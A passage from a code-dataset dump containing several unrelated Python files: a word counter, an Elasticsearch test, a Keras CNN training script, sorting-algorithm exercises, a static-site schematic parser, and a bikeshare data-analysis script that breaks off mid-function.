seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
22913601493 |
def main():
"""Get a string input and print out a formatted list of the occurrence number of words."""
string = input("Enter your string: ")
split_string = string.split(" ")
split_string.sort()
string_dictionary = create_dictionary(split_string)
longest_word_length = find_longest_word(split_string)
for word in string_dictionary:
print("{:{}s} : {}".format(word, longest_word_length, string_dictionary[word]))
def create_dictionary(split_string):
"""Count occurrence of words and return dictionary."""
string_dictionary = {}
for word in split_string:
if word in string_dictionary:
string_dictionary[word] += 1
else:
string_dictionary[word] = 1
return string_dictionary
def find_longest_word(split_string):
"""from a list, find the longest string and return its length."""
longest_word_length = 0
for word in split_string:
if len(word) > longest_word_length:
longest_word_length = len(word)
return longest_word_length
main()
| SPritchard86/cp1404 | cp1404Practicals/prac_05/word_occurrences.py | word_occurrences.py | py | 1,062 | python | en | code | 0 | github-code | 50 |
4643678359 | import logging
import unittest
import factories
from .base import BaseGrapheneElasticTestCase
from ..constants import ALL, VALUE
__all__ = (
'HighlightBackendElasticTestCase',
)
logger = logging.getLogger(__name__)
class HighlightBackendElasticTestCase(BaseGrapheneElasticTestCase):
def setUp(self):
super(HighlightBackendElasticTestCase, self).setUp()
self.alice = "Alice"
self.num_alice_posts = 9
self.alice_posts = factories.PostFactory.create_batch(
self.num_alice_posts
)
for _post in self.alice_posts:
_post.title = "{} {} {}".format(
self.faker.word().title(),
self.alice,
self.faker.word()
)
_post.content = "{} {} {}".format(
self.faker.paragraph(),
self.alice,
self.faker.paragraph()
)
_post.save()
self.sleep(2)
def __check_values(self, edges, stack, empty_stack):
for node in edges:
for key, value in node['node'].items():
if key in stack:
self.assertIsNotNone(value)
elif key in empty_stack:
self.assertIsNone(value)
def __test_search_content(self, search, num_posts, stack, empty_stack):
"""Test search.
content:{%s:"%s"}
:param num_posts:
:return:
"""
query = """
query {
allPostDocuments(search:%s, source:[title, comments, id]) {
edges {
node {
id
title
content
category
comments{
author{
name
age
}
content
createdAt
}
}
}
}
}
""" % search
logger.info(query)
executed = self.client.execute(query)
self.assertEqual(
len(executed['data']['allPostDocuments']['edges']),
num_posts
)
self.__check_values(
executed['data']['allPostDocuments']['edges'],
stack,
empty_stack
)
return executed
def _test_search_content(self):
""""Test search content.
:return:
"""
# Covering specific field lookups: `search:{title:{value:"Another"}}`
with self.subTest('Test search the content on term "Django"'):
self.__test_search_content(
'{content:{%s:"%s"}}' % (VALUE, self.alice),
self.num_alice_posts,
['title', 'comments', 'id'],
['content', 'category']
)
def test_all(self):
"""Test all.
Since we don't write in specific tests, it's more efficient to run
them all from a single method in order to save on speed ups between
tests.
"""
self._test_search_content()
if __name__ == '__main__':
unittest.main()
| barseghyanartur/graphene-elastic | src/graphene_elastic/tests/test_source_backend.py | test_source_backend.py | py | 3,125 | python | en | code | 71 | github-code | 50 |
14440020787 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Dec 19 20:09:54 2019
@author: Juliane
"""
from helpers_DNN import *
from models_DNN import *
from keras.utils import to_categorical
from sklearn.model_selection import train_test_split
EMBEDDING_DIM = 30
BATCH_SIZE = 512
EPOCHS = 260
### Build simple DNN (LSTM, Classical-CNN, Multi-channel CNN)
# Vectorize text data
_, labels, feat_matrices = vectorization(pca=True, pca_comp=30, embedding_dim=EMBEDDING_DIM)
# Convert labels to 2 categorical variables, to be able to use categorical_crossentropy loss function
labels = to_categorical(labels)
X_train, X_test, y_train, y_test = train_test_split(feat_matrices, labels, test_size=0.2, random_state=1)
model = build_classical_CNN(EMBEDDING_DIM)
# model = build_multichannel_CNN(EMBEDDING_DIM)
# model = build_LSTM(EMBEDDING_DIM)
history = model.fit(X_train,
y_train,
batch_size=BATCH_SIZE,
epochs=EPOCHS,
validation_data=(X_test,y_test),
verbose=1)
plot_history(history)
print(model.summary())
### Build multi-embeddings CNN
"""
MAXIMAL_TWEET_LENGTH = 60
padded_sequences, embedding_matrix, labels, vocab_size = multichannel_vectorization(MAXIMAL_TWEET_LENGTH, pca=True, pca_comp=30, embedding_dim=EMBEDDING_DIM)
model = build_multichannel_embeddings(vocab_size, EMBEDDING_DIM, embedding_matrix, MAXIMAL_TWEET_LENGTH)
history = model.fit(padded_sequences, labels, validation_split=0.2, epochs=100, batch_size=200, verbose=2)
plot_history(history)
print(model.summary())
""" | Florent-Sierro/ML_Project_2 | src/main_DNN.py | main_DNN.py | py | 1,616 | python | en | code | 0 | github-code | 50 |
3675159960 | import timeit
# import random
# alist = random.sample(range(1,101),20) #random.sample()生成不相同的随机数
# print(alist)
# 常用排序算法练习
# 所有排序算法都仅考虑升序排列,降序仅需要反一下即可
# 选择排序算法:
# 一句话:从前往后,每个位置选出从此至结尾中最小的
# 默认升序排列一个列表,否则降序
# 思想在于从头开始,两两对比,通过小的占据当前位置,每次选出当前位置最小(升序)或者最大(降序)的值占位,后移一位,直至循环结尾完成排序
# 属于“从前往后”的排序,平均时间复杂度O(n²)
def selection_sort(alist, odrer="asc"):
alist = list(alist) # 将元组转化为一个新的list,避免后续多次排序影响源列表
start = timeit.default_timer()
# print(alist)
times = 0
alen = len(alist)
for i in range(0,alen):
for j in range(i+1,alen):
temp = alist[i]
if alist[j] < alist[i]:
alist[i] = alist[j]
alist[j] = temp
times+=1
print("Time used:",(timeit.default_timer() - start)*1000,"ms")
print("选择排序迭代次数:",times)
print(alist)
# 冒泡算法:
# 一句话:从后往前,每个位置选出从此至开头最大的
# 默认升序排列一个列表,否则降序
# 思想在于从首位开始,两两比较,将大的后移,将从首位到该轮末尾最大的移至末尾,下一轮末尾位置前移一位,逐轮循环,直至本轮末尾到达首位停止,完成排序
# 属于“从后往前”的排序,平均时间复杂度O(n²)
def bubble_sort(alist, odrer="asc"):
start=timeit.default_timer()
alist = list(alist) #将元组转化为一个新的list,避免后续多次排序影响源列表
#print(alist)
times = 0
alen = len(alist)
for i in range(0,alen-1):
for j in range(0,alen-i-1):
temp = alist[j]
if alist[j] > alist[j+1]:
alist[j] = alist[j+1]
alist[j+1] = temp
times+=1
print("Time used:",(timeit.default_timer() - start)*1000,"ms")
print("冒泡排序迭代次数:",times)
print(alist)
# 插入排序算法:
# 一句话:从前往后,逐一向已排序好的序列中插入紧后元素(或者说:前两个元素先排序好,之后从第三个开始选择插入位置,依此后退,直至结尾)
# 默认升序排列一个列表,否则降序
# 思想在于从第二个元素(游标位置为1)开始,将当前元素逐步前移直至遇到更小的停止一轮插入,游标后移一位,重复下一轮,直至末尾元素完成插入,则排序完成
# 属于“从前往后”的排序,平均时间复杂度O(n²),一般地要快过冒泡排序
def insertion_sort(alist, odrer="asc"):
start=timeit.default_timer()
alist = list(alist) #将元组转化为一个新的list,避免后续多次排序影响源列表
#print(alist)
times = 0
alen = len(alist)
for i in range(0,alen):
position = i
current_value = alist[position]
while position > 0 and alist[position-1] > current_value:
alist[position] = alist[position-1]
alist[position-1] = current_value
position-=1
times+=1
print("Time used:",(timeit.default_timer() - start)*1000,"ms")
print("插入排序迭代次数:",times)
print(alist)
# 希尔排序算法:直接插入排序算法的步长改进算法,又称缩小增量排序、递减增量排序。
# 默认升序排列一个列表,否则降序
# 思想在于,直接插入排序每次只能将数据移动一位,而步长从1改为gap(就是跳过等距的数)提高移动速度,
# 相当于直接插入算法,步长从1改为gap,再加入限制条件gap > 0即可(巧记),
# 步长使用的是Donald Shell的建议,每次缩为上次分组量的一半,将整租按插入排序实现插入,直至分组量为1
# **另外步长还可以使用Sedgewick提出的(1, 5, 19, 41, 109,…)
# **也可以使用斐波那契数列除去0和1将剩余的数以黄金分区比的两倍的幂进行运算得到的数列。
# 属于“从前往后”的排序,平均时间复杂度O(nlog2n)“n倍的log以2为底n”,一般地要快过直接插入排序
def shell_sort(alist, odrer="asc"):
start=timeit.default_timer()
alist = list(alist) #将元组转化为一个新的list,避免后续多次排序影响源列表
# print(alist)
times = 0
alen = len(alist)
# 初始步长
gap = alen // 2
while gap > 0:
for i in range(gap,alen):
# 每个步长进行插入排序
position = i
current_value = alist[position]
while position >= gap and alist[position-gap] > current_value:
alist[position] = alist[position-gap]
alist[position-gap] = current_value
position-=gap
times+=1
gap = gap // 2
print("Time used:",(timeit.default_timer() - start)*1000,"ms")
print("希尔排序迭代次数:",times)
print(alist)
# 快速排序算法:对冒泡排序的一种有效改进,但思想已经有了巨大的变化,戏称:挖坑填数+分治法。
# 默认升序排列一个列表,否则降序
# 思想在于,任选一个元素作为“基准”(pivot),通过交换,将大于它的放右边,小于它放左边,进而确定了这个值的位置,
# 进而再次依赖该方法分别再次递归左侧和右侧,直至只有单侧只有一个位置,停止迭代
# 具体的说:任选(选定首位)为基准,末尾序号倒退(递减),直至遇到一个小于等于基准的则将基准位填入该值,而后首位序号前进(递增),
# 直到遇到一个大于基准的,则将倒退停下的位置填入该值,继续轮动,直至后退与前进相遇(序号相同),则将基准填入该位置,一次“分治”完成。
# 每当后退位置元素小于基准,且前进位置元素大于基准,则交换(放入正确的位置),直至两者相遇,则一轮“分边”完成
# **也可以用迭代的方法,而非递归
# 属于“从前往后”的排序,平均时间复杂度O(nlog2n)“n倍的log以2为底n”,一般地要快过直接插入排序
def quick_sort(alist,lb = None,ub = None):
# lb为列表alist中快排起点下标(lower bound),ub为列表alist快排终点下标(upper bound),默认空,则需快排列表全部
# 第一个参数为列表,则为引用传值,每次迭代都将影响源列表的值,故此并不需要提前返回值,如果为元组,则为值传递
# start=timeit.default_timer()
if not isinstance(alist,list) :
return "第一参数不是list"
alen = len(alist)
if alen <=1:
return alist
if lb is None or ub is None :
lb = 0
ub = alen - 1
elif lb < 0 or ub > alen -1 or lb > ub :
return "Error:快排起止点越界或者顺序不合理!"
forwords = lb
backwords = ub
# alist = list(alist) #将元组转化为一个新的list,避免后续多次排序影响源列表
# print(alist[lb:ub+1]) # 列表截取是前闭后开区间,为了保证最后一个下标不遗漏,所以要+1
# 初始基准
pivot = alist[lb]
# 开始计数
times = 0
while forwords < backwords :
# while alist[forwords] <= pivot:
while alist[backwords] >= pivot and forwords < backwords : # 保障停止后退仅因为出现小于基准
backwords -= 1
if alist[backwords] < pivot and forwords < backwords : # 保障后退位值填入前进位坑,仅是因为找到一个小于基准的元素
alist[forwords] = alist[backwords]
forwords += 1
times += 1
while alist[forwords] <= pivot and forwords < backwords : # 保障停止后退仅因为出现小于基准
forwords += 1
if alist[forwords] > pivot and forwords < backwords : # 保障后退位值填入前进位坑,仅是因为找到一个小于基准的元素
alist[backwords] = alist[forwords]
backwords -= 1
times += 1
alist[forwords] = pivot
quick_sort(alist,lb,forwords-1)
quick_sort(alist,forwords+1,ub)
return alist
# print("Time used:",(timeit.default_timer() - start)*1000,"ms")
# print("希尔排序迭代次数:",times)
# print(alist)
# 函数传递参数为可变对象(列表、字典)时,结果是引用传递,而非普通变量的值传递
# l1=(8,13,2,1,9,7,4,6)
l1=(82, 11, 99, 8, 59, 83, 48, 12, 39, 63, 44, 73, 41, 86, 79, 35, 13, 98, 10, 42)
# selection_sort(l1)
# bubble_sort(l1)
# insertion_sort(l1)
shell_sort(l1)
# l3=[82, 11, 99, 8, 59, 83, 48, 12, 39, 63, 44, 73, 41, 86, 79, 35, 13, 98, 10, 42]
# start=timeit.default_timer()
# print(quick_sort(l3))
# print("Time used:",(timeit.default_timer() - start)*1000,"ms")
# # a = b = 1
# # print(a,b)
# aaa = [3*x for x in l1]
# print(aaa)
# 阶乘
def fact(n):
if n == 1:
return 1
return n*fact(n-1)
# print(fact(120)) | jasonshaw/learningpython | test.py | test.py | py | 8,663 | python | zh | code | 0 | github-code | 50 |
38949396195 | # read schematic functions
from libraries import constants as ct
from libraries import globals as gb
from libraries import schematics as sch
from libraries import meta_elements as me
from libraries import html_elements as he
from libraries import string_processes as sp
from libraries import header
from libraries import main
from libraries import before_after
from libraries import footer
from libraries import lists as ls
def get_settings(content):
type_none = ct.PCOM_NO_ENTRY
out = sp.pcom_build_dictionary(gb.DEFAULT_SETTINGS)
settings = sp.pcom_build_dictionary(gb.DEFAULT_SETTINGS)
args = sp.pcom_build_dictionary(gb.DEFAULT_GET_FIRST_COMMAND_ARGS)
schematic_content = pcom_get_schematic_tags(content)
out = me.pcom_process_settings_meta_syntax(schematic_content['meta'],out)
default_header,settings = polimorf_process_settings_schematic(
schematic=schematic_content['header'],
args=args,
placement=ct.PCOM_SETTINGS_HEADER,
type=type_none,
settings=out)
default_before,settings = polimorf_process_settings_schematic(
schematic=schematic_content['before'],
args=args,
placement=ct.PCOM_SETTINGS_BEFORE,
type=type_none,
settings=out)
default_main,settings = polimorf_process_settings_schematic(
schematic=schematic_content['main'],
args=args,
placement=ct.PCOM_SETTINGS_MAIN,
type=type_none,
settings=out)
default_after,settings = polimorf_process_settings_schematic(
schematic=schematic_content['after'],
args=args,
placement=ct.PCOM_SETTINGS_AFTER,
type=type_none,
settings=out)
default_after,settings = polimorf_process_settings_schematic(
schematic=schematic_content['after'],
args=args,
placement=ct.PCOM_SETTINGS_AFTER,
type=type_none,
settings=out)
default_sidebar,settings = polimorf_process_settings_schematic(
schematic=schematic_content['sidebar'],
args=args,
placement=ct.PCOM_SETTINGS_SIDEBAR,
type=type_none,
settings=out)
default_footer,settings = polimorf_process_settings_schematic(
schematic=schematic_content['footer'],
args=args,
placement=ct.PCOM_SETTINGS_FOOTER,
type=type_none,
settings=out)
default_header_additions = polimorf_process_additions_schematic(
schematic=schematic_content['header'],
args=args,
placement=ct.PCOM_SETTINGS_HEADER,
type=type_none)
default_footer_additions = polimorf_process_additions_schematic(
schematic=schematic_content['footer'],
args=args,
placement=ct.PCOM_SETTINGS_FOOTER,
type=type_none)
out['default_header'] = sp.pcom_create_html_from_array(default_header)
out['default_before'] = sp.pcom_create_html_from_array(default_before)
out['default_main'] = sp.pcom_create_html_from_array(default_main)
out['default_after'] = sp.pcom_create_html_from_array(default_after)
out['default_sidebar'] = sp.pcom_create_html_from_array(default_sidebar)
out['default_footer'] = sp.pcom_create_html_from_array(default_footer)
if default_header_additions and default_header_additions != ct.PCOM_NO_ENTRY:
out['default_header_additions'] = sp.pcom_create_html_from_array(default_header_additions)
if default_footer_additions and default_footer_additions != ct.PCOM_NO_ENTRY:
out['default_footer_additions'] = sp.pcom_create_html_from_array(default_footer_additions)
return out
def polimorf_determine_schematic_reference(content, settings):
out = {}
# get schematic content per tag
schematic_content = pcom_get_schematic_tags(content)
main_only = ct.PCOM_MAIN_PLACEMENT
main_side = ct.PCOM_MAIN_WITH_SIDEBAR_PLACEMENT
sidebar_side = ct.PCOM_SIDEBAR_PLACEMENT
type_before = ct.PCOM_BEFORE_TYPE
type_after = ct.PCOM_AFTER_TYPE
type_none = ct.PCOM_NO_ENTRY
# reset postlist present
settings['postlist_present'] = False
# if not meta data return meta tag only
out['meta'] = schematic_content['meta']
if schematic_content['meta'] != ct.PCOM_NO_ENTRY:
# process header content
args = sp.pcom_build_dictionary(gb.DEFAULT_GET_FIRST_COMMAND_ARGS)
out['meta'] = me.pcom_process_meta_syntax(schematic_content['meta'])
out['header'],settings = polimorf_process_schematic(
schematic=schematic_content['header'],
args=args,
placement=ct.PCOM_HEADER_PLACEMENT,
type=ct.PCOM_NO_ENTRY,
settings=settings)
out['before'],settings = polimorf_process_schematic(
schematic=schematic_content['before'],
args=args,
placement=ct.PCOM_MAIN_PLACEMENT,
type=ct.PCOM_BEFORE_TYPE,
settings=settings)
out['after'],settings = polimorf_process_schematic(
schematic=schematic_content['after'],
args=args,
placement=ct.PCOM_MAIN_PLACEMENT,
type=ct.PCOM_AFTER_TYPE,
settings=settings)
# main and sidebar
if (schematic_content['sidebar'] != ct.PCOM_NO_ENTRY):
out['main'],settings = polimorf_process_schematic(
schematic=schematic_content['main'],
args=args,
placement=ct.PCOM_MAIN_WITH_SIDEBAR_PLACEMENT,
type=ct.PCOM_NO_ENTRY,
settings=settings)
out['sidebar'],settings = polimorf_process_schematic(
schematic=schematic_content['sidebar'],
args=args,
placement=ct.PCOM_SIDEBAR_PLACEMENT,
type=ct.PCOM_NO_ENTRY,
settings=settings)
else:
out['main'],settings = polimorf_process_schematic(
schematic=schematic_content['main'],
args=args,
placement=ct.PCOM_MAIN_PLACEMENT,
type=ct.PCOM_NO_ENTRY,
settings=settings)
out['sidebar'] = [ct.PCOM_NO_ENTRY]
out['footer'],settings = polimorf_process_schematic(
schematic=schematic_content['footer'],
args=args,
placement=ct.PCOM_FOOTER_PLACEMENT,
type=ct.PCOM_NO_ENTRY,
settings=settings)
return {'processed': out, 'schematic_content': schematic_content, 'processed_settings': settings}
#
# Parse schematic using tags. Function returns schematic sections
# that are used to set globals for further schematic processing
#
def pcom_get_schematic_tags(format):
# function returns header, main and schematic as an array of strings
meta_tag = ct.PCOM_META_TAG
header_tag = ct.PCOM_HEADER_SCHEMATIC_TAG
main_tag = ct.PCOM_MAIN_SCHEMATIC_TAG
footer_tag = ct.PCOM_FOOTER_SCHEMATIC_TAG
sidebar_tag = ct.PCOM_SIDEBAR_SCHEMATIC_TAG
before_tag = ct.PCOM_BEFORE_MAIN_SCHEMATIC_TAG
after_tag = ct.PCOM_AFTER_MAIN_SCHEMATIC_TAG
#
meta_tag_offset = len(meta_tag)
header_tag_offset = len(header_tag)
main_tag_offset = len(main_tag)
footer_tag_offset = len(footer_tag)
# set up array for output - defaults are empty
out_formats = sp.pcom_build_dictionary(gb.DEFAULT_SCHEMATICS)
#
# search for first #
meta_tag_pos = format.find(meta_tag)
header_tag_pos = format.find(header_tag)
main_tag_pos = format.find(main_tag)
footer_tag_pos = format.find(footer_tag)
#
# meta tag must be there
if (meta_tag_pos) > -1:
if ( ( footer_tag_pos > main_tag_pos) and
( main_tag_pos > header_tag_pos) and
(header_tag_pos > meta_tag_pos) ):
out_formats['meta'] = format[meta_tag_pos+meta_tag_offset : header_tag_pos]
out_formats['header'] = format[header_tag_pos+header_tag_offset : main_tag_pos]
out_formats['main'] = format[main_tag_pos+main_tag_offset : footer_tag_pos]
out_formats['footer'] = format[footer_tag_pos+footer_tag_offset:]
# ================
# CONDITIONAL tags
# ================
# process header to see if there is a BEFORE tag
before_search = sp.pcom_get_strings_syntax_separator(out_formats['header'],before_tag,True)
if before_search['command_found']:
out_formats['before_found'] = True
out_formats['header'] = before_search['syntax_before']
out_formats['before'] = before_search['syntax_after']
# process main to see if there is a SIDEBAR tag
sidebar_search = sp.pcom_get_strings_syntax_separator(out_formats['main'],sidebar_tag,True)
#
if sidebar_search['command_found']:
out_formats['sidebar_found'] = True
out_formats['main'] = sidebar_search['syntax_before']
out_formats['sidebar'] = sidebar_search['syntax_after']
# process SIDEBAR for AFTER tag
after_search = sp.pcom_get_strings_syntax_separator(out_formats['sidebar'],after_tag,True)
if after_search['command_found']:
out_formats['after_found'] = True
out_formats['sidebar'] = after_search['syntax_before']
out_formats['after'] = after_search['syntax_after']
else:
# process for AFTER tag
after_search = sp.pcom_get_strings_syntax_separator(out_formats['main'],after_tag,True)
if after_search['command_found']:
out_formats['after_found'] = True
out_formats['main'] = after_search['syntax_before']
out_formats['after'] = after_search['syntax_after']
#
return out_formats
#
# General schematic command loop
# Uses global list of commands for reference
#
#
def polimorf_process_schematic(schematic,args,placement,type,settings):
# default output
# copy for additions loop
schematic_orig = schematic
if schematic == ct.PCOM_NO_ENTRY:
out = [ct.PCOM_NO_ENTRY]
else:
out = []
# set command data array
schematic_commands = sp.pcom_build_dictionary(gb.DEFAULT_GET_FIRST_COMMAND_OUTPUTS)
schematic_commands['next_command'] = ""
# loop over schematic data - command,syntax,placement,type,settings
while schematic_commands['next_command'] != ct.PCOM_NO_ENTRY:
schematic_commands = sp.pcom_get_first_command(schematic,args)
syntax,settings = he.pcom_command_selection(
command=schematic_commands['command'],
syntax=schematic_commands['command_syntax'],
placement=placement,
type=type,
settings=settings)
schematic = schematic_commands['next_command']
# append to out data
command = schematic_commands['command']
out.append(syntax)
# loop over additions
# set command data array
schematic = schematic_orig
type = ct.PCOM_NO_ENTRY
schematic_commands = sp.pcom_build_dictionary(gb.DEFAULT_GET_FIRST_COMMAND_OUTPUTS)
schematic_commands['next_command'] = ""
while schematic_commands['next_command'] != ct.PCOM_NO_ENTRY:
schematic_commands = sp.pcom_get_first_command(schematic,args)
settings = he.pcom_addition_selection(
command=schematic_commands['command'],
syntax=schematic_commands['command_syntax'],
placement=placement,
type=type,
settings=settings)
schematic = schematic_commands['next_command']
# append to out data
command = schematic_commands['command']
return out,settings
def polimorf_process_settings_schematic(schematic,args,placement,type,settings):
# default output
# convert placements to those used in parsing the html
placement_for_html = pcom_determine_placement(placement)
schematic_orig = schematic
if schematic == ct.PCOM_NO_ENTRY:
out = [ct.PCOM_NO_ENTRY]
else:
out = []
# set command data array
schematic_commands = sp.pcom_build_dictionary(gb.DEFAULT_GET_FIRST_COMMAND_OUTPUTS)
schematic_commands['next_command'] = ""
# loop over schematic data
while schematic_commands['next_command'] != ct.PCOM_NO_ENTRY:
schematic_commands = sp.pcom_get_first_command(schematic,args)
# if command is default replace content with default schematic and reprocess
if schematic_commands['command'] == ct.PCOM_DEFAULT_COMMAND:
schematic = he.pcom_use_settings_defaults(placement, settings)
schematic += schematic_commands['next_command']
schematic_commands = sp.pcom_get_first_command(schematic,args)
syntax,settings = he.pcom_command_selection(
command=schematic_commands['command'],
syntax=schematic_commands['command_syntax'],
placement=placement_for_html,
type=type,
settings=settings)
schematic = schematic_commands['next_command']
# append to out data
command = schematic_commands['command']
out.append(syntax)
return out,settings
def polimorf_process_additions_schematic(schematic,args,placement,type):
# default output
# convert placements to those used in parsing the html
placement_for_html = pcom_determine_placement(placement)
local_settings = {'header_additions': [],
'footer_additions': []}
if schematic == ct.PCOM_NO_ENTRY:
out = ct.PCOM_NO_ENTRY
else:
out = ''
# loop over additions
# set command data array
type = ct.PCOM_NO_ENTRY
schematic_commands = sp.pcom_build_dictionary(gb.DEFAULT_GET_FIRST_COMMAND_OUTPUTS)
schematic_commands['next_command'] = ""
while schematic_commands['next_command'] != ct.PCOM_NO_ENTRY:
schematic_commands = sp.pcom_get_first_command(schematic,args)
local_settings = he.pcom_addition_selection(
command=schematic_commands['command'],
syntax=schematic_commands['command_syntax'],
placement=placement_for_html,
type=type,
settings=local_settings)
schematic = schematic_commands['next_command']
# append to out data
command = schematic_commands['command']
if placement == ct.PCOM_SETTINGS_HEADER:
out = local_settings['header_additions']
if placement == ct.PCOM_SETTINGS_FOOTER:
out = local_settings['footer_additions']
return out
def pcom_determine_placement(placement):
# converts from settings placement
if placement == ct.PCOM_SETTINGS_HEADER:
placement_out = ct.PCOM_HEADER_PLACEMENT
if placement == ct.PCOM_SETTINGS_BEFORE:
placement_out = ct.PCOM_MAIN_PLACEMENT
if placement == ct.PCOM_SETTINGS_MAIN:
placement_out = ct.PCOM_MAIN_PLACEMENT
if placement == ct.PCOM_SETTINGS_AFTER:
placement_out = ct.PCOM_MAIN_PLACEMENT
if placement == ct.PCOM_SETTINGS_SIDEBAR:
placement_out = ct.PCOM_SIDEBAR_PLACEMENT
if placement == ct.PCOM_SETTINGS_FOOTER:
placement_out = ct.PCOM_FOOTER_PLACEMENT
return placement_out
# output html from processed schematic
def polimorf_process_schematic_sections(data, settings,filename,fileroot):
# data is a dictionary with the different sections
# if no meta data return no entry
meta_present = False
out_html = ct.PCOM_NO_ENTRY
add_main_wrap = False
add_after_wrap = False
no_before = False
no_main = False
is_template,is_search = sp.pcom_filter_template(fileroot,settings)
if data['meta'] != ct.PCOM_NO_ENTRY:
meta_present = True
out_html = ''
out_html = header.polimorf_head_and_title(meta_present,settings,data['meta'],filename,fileroot)
if data['header'] != [ct.PCOM_NO_ENTRY]:
out_html += header.polimorf_add_header(data['header'],meta_present) + ct.NL
if data['before'] != [ct.PCOM_NO_ENTRY]:
out_html += before_after.polimorf_add_before(data['before'],data['sidebar'],meta_present)
else:
add_main_wrap = True
no_before = True
if data['main'] != [ct.PCOM_NO_ENTRY] or is_template:
out_html += main.polimorf_add_main(
main_data=data['main'],
sidebar_data=data['sidebar'],
meta_present=meta_present,
wrap=add_main_wrap,
fileroot=fileroot,
settings=settings,
is_template=is_template,
is_search=is_search)
else:
add_after_wrap = True
no_main = True
if data['after'] != [ct.PCOM_NO_ENTRY]:
out_html += (before_after.polimorf_add_after(
after_data=data['after'],
sidebar_data=data['sidebar'],
meta_present=meta_present,
wrap=add_after_wrap) + ct.NL)
else:
if no_before and no_main:
out_html += sch.PM_MAIN_WRAP_OPEN + ct.NL + sch.PM_MAIN_WRAP_CLOSE + ct.NL
else:
out_html += sch.PM_MAIN_WRAP_CLOSE + ct.NL
if data['footer'] != [ct.PCOM_NO_ENTRY]:
out_html += footer.polimorf_add_footer(data['footer'],meta_present)
# close body and html tags
out_html += sch.DEFAULT_FOOTER_SCRIPTS
out_html += sch.PM_CLOSE_BODY_TAG
out_html += sch.PM_CLOSE_HTML_TAG
return out_html
def pcom_process_inserts(html_array,insert_info,outlog,site_settings,filename,dependencies):
args = sp.pcom_build_dictionary(gb.DEFAULT_GET_FIRST_COMMAND_ARGS)
# create local list of inserts from dependencies
local_deps = ls.pcom_get_dependency(dependencies,filename)
valid_inserts = []
for insert in insert_info:
key_ref = insert['filename']
if insert['valid_entry'] == ct.PCOM_VALID_ENTRY:
# process insert
type_none = ct.PCOM_NO_ENTRY
insert_out_data,site_settings = polimorf_process_schematic(
schematic=insert['content'],
args=args,
placement=insert['placement'],
type=type_none,
settings=site_settings)
insert_out = sp.pcom_create_html_from_array(insert_out_data)
# put back in content
html_array[insert['index']] = insert_out
# update dependencies - no change if insert file is already listed
dependencies = ls.pcom_update_dependencies(dependencies,filename,key_ref)
# update local record of inserts processed
valid_inserts.append(key_ref)
else:
# delete line from html array
key_ref += ':No such file'
# put empty string
html_array[insert['index']] = ''
# add log entry
inserts_processed_string = filename + '--' + key_ref + '-PLACEMENT=' + insert['placement']
outlog['inserts_processed'].append(inserts_processed_string)
# once inserts are processed - check if all dependencies where used.
dependencies = ls.pcom_post_process_dependencies(dependencies,filename,valid_inserts)
# if settings.txt is set from default commands then update dependencies
if ct.PCOM_REQ_FILE_SETTINGS in site_settings['add_settings_to_dependencies']:
# update dependencies - no change if insert file is already listed
key_ref = ct.PCOM_REQ_FILE_SETTINGS
dependencies = ls.pcom_update_dependencies(dependencies,filename,key_ref)
#log_detail = 'Inserts for {} found: {}'.format(filename,valid_inserts)
#outlog['valid_inserts'] = log_detail
return html_array,outlog,site_settings,dependencies
| MickyHCorbett/MorfLess | libraries/read_schematic.py | read_schematic.py | py | 22,611 | python | en | code | 0 | github-code | 50 |
32156594739 | import time
import datetime
import pandas as pd
import numpy as np
CITY_DATA = { 'chicago': 'chicago.csv',
'new york city': 'new_york_city.csv',
'washington': 'washington.csv' }
def get_filters():
"""
Asks user to specify a city, month, and day to analyze.
Returns:
(str) city - name of the city to analyze
(str) month - name of the month to filter by, or "all" to apply no month filter
(str) day - name of the day of week to filter by, or "all" to apply no day filter
"""
print('Hello! Let\'s explore some US bikeshare data!')
# get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs
city = input("Please enter a city (from chicago, new york city, washington: ").lower()
while city not in {'chicago', 'new york city', 'washington'}:
print("I'm sorry i did'nt recognise that city!")
city = input("Please enter a city (from chicago, new york city, washington): ").lower()
# get user input for month (all, january, february, ... , june)
month = input("Please enter a month (from all, january, february, march, april, may, june): ").lower()
while month not in {'all', 'january', 'february', 'march', 'april', 'may', 'june'}:
print("I'm sorry i did'nt recognise that month!")
month = input("Please enter a city (from january, february, march, april, may, june): ").lower()
# get user input for day of week (all, monday, tuesday, ... sunday)
day = input("Please enter a day (from all, monday, tuesday, wednesday, thursday, friday, saturday, sunday): ").lower()
while day not in {'all', 'monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday', 'sunday'}:
print("I'm sorry i did'nt recognise that day!")
day = input("Please enter a day (from all, monday, tuesday, wednesday, thursday, friday, saturday, sunday): ").lower()
print('-'*40)
return city, month, day
def load_data(city, month, day):
"""
Loads data for the specified city and filters by month and day if applicable.
Args:
(str) city - name of the city to analyze
(str) month - name of the month to filter by, or "all" to apply no month filter
(str) day - name of the day of week to filter by, or "all" to apply no day filter
Returns:
df - Pandas DataFrame containing city data filtered by month and day
"""
# load data file into a dataframe
df = pd.read_csv(CITY_DATA[city])
# convert the Start Time column to datetime
df['Start Time'] = pd.to_datetime(df['Start Time'])
# extract hour from the Start Time column to create an hour column
df['hour'] = df['Start Time'].dt.hour
# extract month and day of week from Start Time to create new columns
df['month'] = df['Start Time'].dt.month
df['day_of_week'] = df['Start Time'].dt.weekday_name
# filter by month if applicable
if month != 'all':
# use the index of the months list to get the corresponding int
months = ['january', 'february', 'march', 'april', 'may', 'june']
month = months.index(month) + 1
# filter by month to create the new dataframe
df = df[df['month'] == month]
# filter by day of week if applicable
if day != 'all':
# filter by day of week to create the new dataframe
df = df[df['day_of_week'] == day.title()]
return df
def time_stats(df):
"""Displays statistics on the most frequent times of travel."""
print('\nCalculating The Most Frequent Times of Travel for bikes are...\n')
start_time = time.time()
# display the most common month
most_common_month = df['month'].mode()[0]
print('The most common month for travel is: ' + datetime.date(1900, most_common_month, 1).strftime('%B') + '\n')
# display the most common day of week
most_common_day = df['day_of_week'].mode()[0]
print('The most common week day for travel is: ' + str(most_common_day) + '\n')
# display the most common start hour
most_common_hour_start = df['hour'].mode()[0]
